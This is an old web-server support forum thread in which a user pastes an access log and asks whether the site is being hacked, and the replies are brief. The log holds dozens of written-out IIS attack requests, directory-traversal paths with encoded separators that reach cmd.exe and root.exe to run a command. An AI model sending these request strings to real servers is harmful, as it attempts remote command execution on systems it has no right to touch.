Check my access log please! Am I being hacked?

[Vitalichka]

I have a question, I looked at my access log, and noticed that I received 31 hits and 31 of those hits were both HTML hits and Error hits. And if you look at the access log, it looks like someone is trying to hack in. When I trace the IP, it comes out to an AT&T facility.
[b]here's the log.

12.254.161.22 - - [25/Jan/2003:12:45:33 +1133] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 427
12.254.161.22 - - [25/Jan/2003:12:45:34 +1133] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 427
12.254.161.22 - - [25/Jan/2003:12:45:34 +1133] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 427
12.254.161.22 - - [25/Jan/2003:12:45:34 +1133] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 427
12.254.161.22 - - [25/Jan/2003:12:45:35 +1133] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.161.22 - - [25/Jan/2003:12:45:35 +1133] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.161.22 - - [25/Jan/2003:12:45:35 +1133] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.161.22 - - [25/Jan/2003:12:45:36 +1133] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.161.22 - - [25/Jan/2003:12:45:36 +1133] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.161.22 - - [25/Jan/2003:12:45:36 +1133] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.161.22 - - [25/Jan/2003:12:45:36 +1133] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.161.22 - - [25/Jan/2003:12:45:37 +1133] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.161.22 - - [25/Jan/2003:12:45:38 +1133] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.161.22 - - [25/Jan/2003:12:45:38 +1133] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.241.122 - - [25/Jan/2003:13:14:37 +1133] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 427
12.254.241.122 - - [25/Jan/2003:13:14:38 +1133] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 427
12.254.241.122 - - [25/Jan/2003:13:14:42 +1133] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 427
12.254.241.122 - - [25/Jan/2003:13:14:45 +1133] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 427
12.254.241.122 - - [25/Jan/2003:13:14:46 +1133] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.241.122 - - [25/Jan/2003:13:14:46 +1133] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.241.122 - - [25/Jan/2003:13:14:47 +1133] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.241.122 - - [25/Jan/2003:13:14:48 +1133] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.241.122 - - [25/Jan/2003:13:14:48 +1133] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.241.122 - - [25/Jan/2003:13:14:48 +1133] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.241.122 - - [25/Jan/2003:13:14:49 +1133] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.241.122 - - [25/Jan/2003:13:14:49 +1133] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.241.122 - - [25/Jan/2003:13:14:51 +1133] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.241.122 - - [25/Jan/2003:13:14:51 +1133] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.241.122 - - [25/Jan/2003:13:28:45 +1133] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 427
12.254.241.122 - - [25/Jan/2003:13:28:46 +1133] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 427
12.254.241.122 - - [25/Jan/2003:13:28:49 +1133] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 427
12.254.241.122 - - [25/Jan/2003:13:28:50 +1133] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 427
12.254.241.122 - - [25/Jan/2003:13:28:53 +1133] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.241.122 - - [25/Jan/2003:13:28:53 +1133] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.241.122 - - [25/Jan/2003:13:28:54 +1133] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.241.122 - - [25/Jan/2003:13:28:54 +1133] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.241.122 - - [25/Jan/2003:13:28:55 +1133] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.241.122 - - [25/Jan/2003:13:29:04 +1133] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.241.122 - - [25/Jan/2003:13:29:04 +1133] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.241.122 - - [25/Jan/2003:13:29:05 +1133] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.241.122 - - [25/Jan/2003:13:29:09 +1133] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.241.122 - - [25/Jan/2003:13:29:09 +1133] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.161.22 - - [25/Jan/2003:13:41:47 +1133] "GET /scripts/root.exe?/c+dir HTTP/1.0" 404 427
12.254.161.22 - - [25/Jan/2003:13:41:47 +1133] "GET /MSADC/root.exe?/c+dir HTTP/1.0" 404 427
12.254.161.22 - - [25/Jan/2003:13:41:47 +1133] "GET /c/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 427
12.254.161.22 - - [25/Jan/2003:13:41:48 +1133] "GET /d/winnt/system32/cmd.exe?/c+dir HTTP/1.0" 404 427
12.254.161.22 - - [25/Jan/2003:13:41:48 +1133] "GET /scripts/..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.161.22 - - [25/Jan/2003:13:41:48 +1133] "GET /_vti_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.161.22 - - [25/Jan/2003:13:41:48 +1133] "GET /_mem_bin/..%255c../..%255c../..%255c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.161.22 - - [25/Jan/2003:13:41:48 +1133] "GET /msadc/..%255c../..%255c../..%255c/..%c1%1c../..%c1%1c../..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.161.22 - - [25/Jan/2003:13:41:49 +1133] "GET /scripts/..%c1%1c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.161.22 - - [25/Jan/2003:13:41:49 +1133] "GET /scripts/..%c0%2f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.161.22 - - [25/Jan/2003:13:41:49 +1133] "GET /scripts/..%c0%af../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.161.22 - - [25/Jan/2003:13:41:49 +1133] "GET /scripts/..%c1%9c../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.161.22 - - [25/Jan/2003:13:41:50 +1133] "GET /scripts/..%25%35%63../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429
12.254.161.22 - - [25/Jan/2003:13:41:50 +1133] "GET /scripts/..%252f../winnt/system32/cmd.exe?/c+dir HTTP/1.0" 400 429

:?: [/b]

[tdkyo]

dunno but e-mail att and yell at them to check this situation out. Something tells me this is bad...

[Vitalichka]

I mean that's 56 hits 56 Error Hits and 56 HTML Hits.

and the IP's are from the same range.

Thank you

[Vitalichka]

[quote="tdkyo"]dunno but e-mail att and yell at them to check this situation out. Something tells me this is bad...[/quote]

Why would you say that?
Wouldn't it be a waste of time yelling at the incompitent technicians?
And also, I don't think you can run any kind of server through ATT service.

[aprelium]

Vitalichka,

Please read http://www.aprelium.com/forum/viewtopic.php?t=807 .
_________________
Support Team
Aprelium - http://www.aprelium.com